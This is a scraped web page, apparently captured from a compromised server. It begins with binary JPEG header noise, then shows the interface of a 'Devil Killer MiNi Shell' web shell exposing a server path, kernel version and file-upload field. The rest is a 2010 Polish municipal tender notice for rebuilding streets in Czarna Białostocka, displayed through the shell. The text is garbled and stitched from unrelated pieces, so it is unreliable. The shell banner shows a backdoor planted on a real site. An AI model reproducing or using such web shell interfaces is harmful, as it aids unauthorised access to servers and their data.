JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100610/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100610/163064-N-2010.html

<p class="kh_header"><b>Czarna Białostocka: Przebudowa ulic w Czarnej Białostockiej</b><br>
<b>Numer ogłoszenia: 163064 - 2010; data zamieszczenia: 10.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czarna Białostocka reprezentowana przez Burmistrza Czarnej Białostockiej , ul. Traugutta 2, 16-020 Czarna Białostocka, woj. podlaskie, tel. 085 7131367, faks 085 7131349.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czarnabialostocka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulic w Czarnej Białostockiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa ulic: Sportowej, Wybickiego i Ogrodowej w Czarnej Białostockiej:
1.	Zadanie I: Przebudowa ulicy Sportowej w Czarnej Białostockiej na odcinku od ulicy H. Sienkiewicza do ulicy M. Konopnickiej; długość ulicy  wynosi ok. 0,096 km; prace obejmują budowę ulicy o szerokości 5,50 m, budowę obustronnych chodników oddzielonych od jezdni pasem zieleni, parkingu i kanalizacji deszczowej:
a)	zakres robót obejmuje w szczególności:
odtworzenie trasy i punktów wysokościowych - ok. 0,096 km,
karczowanie drzew o śr.36-55 cm - szt. 2,
rozebranie podbudowy z brukowca - ok. 504 m2,
rozebranie nawierzchni z mieszanek mineralno-bitumicznych - ok. 40 m2,
rozebranie nawierzchni z betonu - ok. 97 m2,
rozebranie nawierzchni z płyt drogowych betonowych (trylinki) - ok. 42 m2,
rozebranie chodników z płyt betonowych - ok. 65 m2,
rozebranie krawężników betonowych - ok. 190 m2,
rozebranie obrzeży betonowych - ok. 313 m,
rozebranie słupków do znaków - szt. 1,
zdjęcie tarcz do znaków  - szt. 1,
wykonanie wykopów mechanicznie w gruncie kat. III z transportem urobku na odległość do 5 km - ok. 288 m3,
regulacja studzienek rewizyjnych - szt. 1,
wykonanie koryta ręcznie  wraz z profilowaniem i zagęszczeniem podłoża w gruncie kat. I-IV, głębokość  do 10 cm - ok. 875 m2,
 podbudowa z kruszywa naturalnego, warstwa dolna 15 cm grubości - ok. 855 m2,
 podbudowa z kruszywa naturalnego, warstwa górna grubości 10 cm - ok. 855 m2,
 nawierzchnia z kostki betonowej brukowej grubości 8 cm - ok. 855 m2,
 oznakowanie poziome jezdni materiałami cienkowarstwowymi (farbą) - strzałki i inne symbole - ok. 1,41 m2,
 słupki z rur stalowych do znaków drogowych - 8 szt.,
 tarcze znaków drogowych odblaskowych - 13 szt.,
 krawężniki betonowe 15x30 na ławie betonowej - ok. 409 m.,
 wykonanie chodników z kostki brukowej betonowej bordowej grubości 6 cm - ok. 272 m2,
 obrzeża betonowe 20x6 cm - ok. 264 m;
b)	budowa kanalizacji deszczowej obejmuje w szczególności:
 budowa kanału deszczowego z rur PP dwuściennych fi 315/276 - ok. 41,50 m,
 przykanaliki z rur PP dwuściennych fi 200/174 - ok. 13 m,
 studnie rewizyjne betonowe fi 1000 mm - 2 szt.,
 studzienki ściekowe betonowe fi 500 mm - 4 szt. 
c)	wykonanie i uzgodnienie projektu organizacji ruchu na czas prowadzenia robót w pasach drogowych dróg gminnych z Gminą Czarna Białostocka oraz w pasie drogowym drogi powiatowej (rejon skrzyżowania) z Powiatowym Zarządem Dróg w Białymstoku wraz z uwzględnieniem  kosztów zajęcia pasa drogowego na czas prowadzonych robót.
2.	Zadanie II: Przebudowa ulicy Wybickiego w Czarnej Białostockiej na odcinku od ulicy R. Traugutta  do posesji Nr 6 ; długość ulicy wynosi ok. 135,65 m; prace obejmują budowę ulicy o szerokości 5,0 m, budowę obustronnych chodników, parkingu i przebudowę istniejącej linii telefonicznej:
a)	zakres robót obejmuje w szczególności:
 odtworzenie trasy i punktów wysokościowych - ok. 135,65 m,
 rozebranie nawierzchni z betonu  - ok. 116 m2,
 rozebranie krawężników betonowych - ok. 36 m,
 wykonanie wykopów mechanicznie w gruncie kat. III z transportem urobku na odkład na odległość 5 km - ok. 211 m3,
 regulacja pionowa kratek ściekowych -  1 szt.,
 regulacja pionowa studzienek rewizyjnych - 11 szt.,
 regulacja pionowa zaworów wodociągowych - 5 szt.,
 wykonanie koryta ręcznie  wraz z profilowaniem i zagęszczeniem podłoża w gruncie kat. I-IV, głębokość  do 10 cm - ok. 722 m2,
 podbudowa z kruszywa naturalnego, warstwa dolna 10 cm grubości - ok. 622 m2,
 wykonanie podbudowy z kruszywa łamanego stabilizowanego mechanicznie, warstwa górna grubości 10 cm - ok. 622 m2,
 nawierzchnia z kostki betonowej brukowej koloru naturalnego betonu o grubości 8 cm - ok. 622 m2,
 słupki z rur stalowych do znaków drogowych - 6 szt.,
 tarcze znaków drogowych odblaskowych - 10 szt.,
 krawężniki betonowe 15x30 na ławie betonowej - ok. 253 m.,
 wykonanie chodników z kostki brukowej betonowej koloru grafitowego o  grubości 6 cm - ok. 100 m2,
 obrzeża betonowe 20x6 cm - ok. 206 m, 
 wykonanie zjazdów gospodarczych kostki brukowej koloru bordowego o  grubości  8 cm - ok. 21m2,
 budowa obiektów podziemnych z rur HDPE110/6,3 pod drogami w gruncie kat III, liczba (warstw x rur w warstwie x rur w ciągu): 1x1x1 m - ok. 30 m,
 budowa obiektów podziemnych z rur A110PS pod drogami w gruncie kat III, liczba (warstw x rur w warstwie x rur w ciągu) :1x1x1 - ok. 36 m,
 budowa rurociągu kablowego na głębokości 1 m w wykopie wykonanym ręcznie, grunt kategorii  III, rury w zwojach HDPE o średnicy 40 mm, 1 rura w rurociągu - ok. 85 m,
 wciąganie kabla wypełnionego w powłoce termoplastycznej do kanalizacji kablowej, ręcznie, średnica kabla do 30mm, otwór kanalizacji wolny - ok. 85 m, 
 montaż  złączy przelotowych kabli wypełnionych typu kanałowego ułożonych w ziemi z zastosowaniem łączników żył i termokurczliwych osłon wzmocnionych, kabel o 10 parach,
 pomiary końcowe prądem stałym kabla o 10 parach - 1 złącze,
 demontaż kabla doziemnego w gruncie kat. III, kabel fi do 30 mm - ok. 90 m;
b)	wykonanie i uzgodnienie projektu organizacji ruchu na czas prowadzenia robót w pasach drogowych dróg gminnych z Gminą Czarna Białostocka wraz z uwzględnieniem  kosztów zajęcia pasa drogowego na czas prowadzonych robót.
3.	Zadanie III: Przebudowa ulicy Ogrodowej w Czarnej Białostockiej na odcinku od ulicy J. Piłsudskiego do ulicy R. Traugutta; długość ulicy wynosi ok. 188,65 m; prace obejmują budowę ulicy o szerokości 3,5 m, budowę obustronnych chodników, regulacji istniejących studzienek kanalizacyjnych, obudów zaworów wodociągowych oraz wykonanie nowych wpustów ściekowych:
a)	zakres robót obejmuje w szczególności:
 odtworzenie trasy i punktów wysokościowych - ok. 188,65 m,
 rozebranie nawierzchni z mieszanek mineralno - bitumicznych  - ok. 36 m2,
 rozebranie nawierzchni z betonu - ok. 44m2,
 rozebranie nawierzchni z płyt drogowych betonowych (trylinki) - ok. 958 m2,
 rozebranie chodników z płyt betonowych 50x50x7 - ok. 9 m2,
 rozebranie nawierzchni z kostki betonowej brukowej grubości 8 cm - ok. 6 m2,
 rozebranie krawężników betonowych - ok. 381 m2,
 rozebranie słupków do znaków drogowych - 3 szt.,
 zdjęcie tarcz znaków drogowych - 4 szt.,
 wykonanie wykopów mechanicznie w gruncie kat. III z transportem urobku na odkład na odległość 5 km - ok. 194 m3,
 roboty ziemne poprzeczne na przerzut - ok. 17 m3,
 wykonanie nasypów mechanicznie z gruntu kat. I-IV uzyskanego z wykopu - ok. 12 m3,
 regulacja pionowa studzienek rewizyjnych  - 13 szt.,
 regulacja pionowa zaworów wodociągowych  - 12 szt.,
 wykonanie koryta ręcznie  wraz z profilowaniem i zagęszczeniem podłoża w gruncie kat. I-IV, głębokość  do 10 cm - ok. 1270 m2,
 oczyszczenie warstw konstrukcyjnych mechanicznie - ok. 612 m2,
 skropienie warstw konstrukcyjnych emulsja asfaltową - ok. 612 m2,  
 podbudowa z kruszywa naturalnego, warstwa dolna 10 cm grubości - ok. 612 m2,
 wykonanie podbudowy z kruszywa naturalnego stabilizowanego mechanicznie, warstwa górna grubości 10 cm - ok. 612 m2,
 wykonanie nawierzchni z betonu asfaltowego, warstwa wiążąca grubości 4 cm - ok. 612 m2,
 wykonanie nawierzchni z betonu asfaltowego , warstwa ścieralna grubości 4 cm - ok. 612 m2, 
 oznakowanie poziome jezdni materiałami cienkowarstwowymi (farbami), linie ciągłe - ok. 2 m2,
 oznakowanie poziome jezdni materiałami cienkowarstwowymi (farbami) linie na skrzyżowaniach i przejściach dla pieszych - ok. 20,5 m2,
 słupki z rur stalowych do znaków drogowych - 10 szt.,
 tarcze znaków drogowych odblaskowych - 14 szt.,
krawężniki betonowe 15x30 na ławie betonowej - ok. 385 m.,
 wykonanie chodników z kostki brukowej betonowej koloru grafitowego o  grubości 6 cm - ok. 658 m2,
obrzeża betonowe 20x6 cm - ok. 322 m, 
wykonanie zjazdów gospodarczych z kostki brukowej koloru bordowego o  grubości  8 cm - ok. 95m2;
b)	budowa kanalizacji deszczowej obejmuje w szczególności:
 budowa przykanalików z rur fi 170/149PP z włączeniem do istniejących studzienek kanalizacyjnych,
 studzienki ściekowe fi 600 PP/PE z osadnikiem 80cm, wpust ściekowy klasy D400 - 6 szt.;
c)	wykonanie i uzgodnienie projektu organizacji ruchu na czas prowadzenia robót w pasach drogowych dróg gminnych z Gminą Czarna Białostocka oraz w pasie drogowym drogi powiatowej (rejon skrzyżowania) z Powiatowym Zarządem Dróg w Białymstoku wraz z uwzględnieniem  kosztów zajęcia pasa drogowego na czas prowadzonych robót.
4.	Szczegółowy zakres prac zawierają przedmiary robót, dokumentacja projektowa oraz specyfikacje techniczne wykonania i odbioru robót, stanowiące załączniki do niniejszej specyfikacji.
5.	Projekty budowlane oraz specyfikacje techniczne wykonania i odbioru robót w wersji papierowej dostępne są w siedzibie Zamawiającego.
6.	Materiały użyte do montażu powinny posiadać odpowiednie dopuszczenia do stosowania w budownictwie oraz odpowiadać wymaganiom określonym w projekcie budowlanym i w STWiOR.
7.	Wymagania organizacyjne:
a)	końcowe rozliczenie nastąpi na podstawie faktury (rachunku) z 30-dniowym terminem płatności, który wykonawca wystawi po podpisaniu protokołu odbioru końcowego  bez uwag;
b)	ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy;
c)	określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia
8.	Wymagania dot. gwarancji:
Wykonawca udzieli Zamawiającemu gwarancji jakości wykonania przedmiotu umowy na okres 36 miesięcy od daty podpisania przez zamawiającego i wykonawcę protokołu końcowego.
9.	Wykonawca w trakcie realizacji zamówienia może składać wnioski i propozycje zmiany sposobu wykonania zamówienia, które przyspieszą ukończenie robót.
10.	Zamawiający dopuszcza wprowadzenie zmian technicznych i technologicznych w urządzeniach, materiałach, w przypadku gdy wystąpi co najmniej jedna z poniższych okoliczności:
a)	konieczność zrealizowania umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa,
b)	zmiany w wymaganiach parametrycznych urządzeń w związku z pojawiającymi się rozwojowymi zmianami techniczno-technonolicznymi, wynikami prowadzonych badań i analiz oraz doświadczeniami eksploatacyjnymi zamawiającego.
11.	Zamawiający dopuszczając wprowadzenie zmian sposobu wykonania zamówienia, zmian technicznych i technologicznych w urządzeniach, materiałach, w przypadku wystąpienia wymienionych okoliczności nie dopuszcza zmiany wysokości wynagrodzenia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podsta</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 2.	Ustala się wadium w wysokości:
a)	zadanie I: 7.000,00 zł (słownie: siedem tysięcy złotych);
b)	zadanie II: 6.000,00 zł (słownie: sześć tysięcy złotych);
c)	zadanie III: 12.000,00 zł (słownie: dwanaście tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę realizacji co najmniej 3 robót budowlanych polegających na wykonaniu drogi o długości min. 0,3 km i szerokości jezdni min. 5 m w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę dysponowaniem kierownikiem budowy posiadającym uprawnienia do kierowania robotami branży drogowej, posiadającym aktualny wpis do właściwej izby</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o sumie ubezpieczenia odpowiedzialności cywilnej w wysokości  min. 150.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	formularz ofertowy - wypełniony i podpisany przez wykonawcę z wykorzystaniem załączonego wzoru;

b)	oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych z wykorzystaniem załączonego wzoru;
c)	jeżeli wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, należy dołączyć pisemne zobowiązania tych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia;
d)	kosztorys ofertowy sporządzony w oparciu o przedmiary robót stanowiące Załączniki do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmian w umowie w trybie art. 144 ust. 1 ustawy Pzp:
a)	w zakresie zmiany terminu realizacji przedmiotu umowy w przypadku:
 wystąpienia konieczności wykonania dodatkowych i niemożliwych do przewidzenia robót, których realizacja wiąże się z potrzebą zmiany terminu wykonania,
 szczególnie niesprzyjających warunków atmosferycznych,
